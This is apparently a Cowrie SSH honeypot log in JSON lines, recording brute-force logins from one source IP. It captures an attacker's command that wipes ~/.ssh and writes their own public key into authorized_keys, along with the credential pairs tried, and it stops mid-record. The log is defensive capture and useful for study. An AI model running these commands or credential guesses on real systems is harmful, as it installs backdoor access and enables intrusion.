{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:28.413838Z","src_ip":"212.227.235.229","session":"dfd0ebebbb58"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:29.292897Z","src_ip":"212.227.235.229","session":"dfd0ebebbb58"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:30.499285Z","src_ip":"212.227.235.229","session":"dfd0ebebbb58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41166,"dst_ip":"1.2.3.4","dst_port":22,"session":"7de35c32a980","protocol":"ssh","message":"New connection: 212.227.235.229:41166 (1.2.3.4:22) [session: 7de35c32a980]","sensor":"my-vps","timestamp":"2025-09-08T21:55:37.460836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:37.461920Z","src_ip":"212.227.235.229","session":"7de35c32a980"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53376,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d7cb20f860b","protocol":"ssh","message":"New connection: 212.227.235.229:53376 (1.2.3.4:22) [session: 6d7cb20f860b]","sensor":"my-vps","timestamp":"2025-09-08T21:55:37.484324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:37.485007Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:37.663544Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:37.759399Z","src_ip":"212.227.235.229","session":"7de35c32a980"}
{"eventid":"cowrie.login.success","username":"root","password":"sasman","message":"login attempt [root/sasman] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:55:38.420344Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:55:38.834441Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:55:38.835135Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:55:38.835982Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"2025","message":"login attempt [anonymous/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:38.981653Z","src_ip":"212.227.235.229","session":"7de35c32a980"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:39.015661Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:55:39.389825Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:55:39.390512Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:55:39.571055Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:39.571892Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53390,"dst_ip":"1.2.3.4","dst_port":22,"session":"2642c5f98ab1","protocol":"ssh","message":"New connection: 212.227.235.229:53390 (1.2.3.4:22) [session: 2642c5f98ab1]","sensor":"my-vps","timestamp":"2025-09-08T21:55:39.745485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:39.746213Z","src_ip":"212.227.235.229","session":"2642c5f98ab1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:39.922168Z","src_ip":"212.227.235.229","session":"2642c5f98ab1"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:40.279255Z","src_ip":"212.227.235.229","session":"7de35c32a980"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:40.665605Z","src_ip":"212.227.235.229","session":"2642c5f98ab1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:41.843499Z","src_ip":"212.227.235.229","session":"2642c5f98ab1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53398,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb150da1cf1","protocol":"ssh","message":"New connection: 212.227.235.229:53398 (1.2.3.4:22) [session: 0bb150da1cf1]","sensor":"my-vps","timestamp":"2025-09-08T21:55:42.023818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:42.024643Z","src_ip":"212.227.235.229","session":"0bb150da1cf1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:42.206049Z","src_ip":"212.227.235.229","session":"0bb150da1cf1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:55:42.969720Z","src_ip":"212.227.235.229","session":"0bb150da1cf1"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:43.153352Z","src_ip":"212.227.235.229","session":"6d7cb20f860b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:43.154214Z","src_ip":"212.227.235.229","session":"0bb150da1cf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55682,"dst_ip":"1.2.3.4","dst_port":22,"session":"d851af9ccce7","protocol":"ssh","message":"New connection: 212.227.235.229:55682 (1.2.3.4:22) [session: d851af9ccce7]","sensor":"my-vps","timestamp":"2025-09-08T21:55:51.145044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:51.146013Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:51.481267Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.login.success","username":"root","password":"praneeth","message":"login attempt [root/praneeth] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:55:52.858763Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:55:53.574209Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:55:53.575054Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:55:53.575882Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:53.911052Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:55:54.691033Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:55:54.691873Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:55:55.028069Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:55.028915Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55692,"dst_ip":"1.2.3.4","dst_port":22,"session":"14d959210567","protocol":"ssh","message":"New connection: 212.227.235.229:55692 (1.2.3.4:22) [session: 14d959210567]","sensor":"my-vps","timestamp":"2025-09-08T21:55:55.363417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:55.364024Z","src_ip":"212.227.235.229","session":"14d959210567"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:55.701147Z","src_ip":"212.227.235.229","session":"14d959210567"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:57.085991Z","src_ip":"212.227.235.229","session":"14d959210567"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:58.431504Z","src_ip":"212.227.235.229","session":"14d959210567"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43802,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4369cf888da","protocol":"ssh","message":"New connection: 212.227.235.229:43802 (1.2.3.4:22) [session: a4369cf888da]","sensor":"my-vps","timestamp":"2025-09-08T21:55:58.747270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:58.748309Z","src_ip":"212.227.235.229","session":"a4369cf888da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp25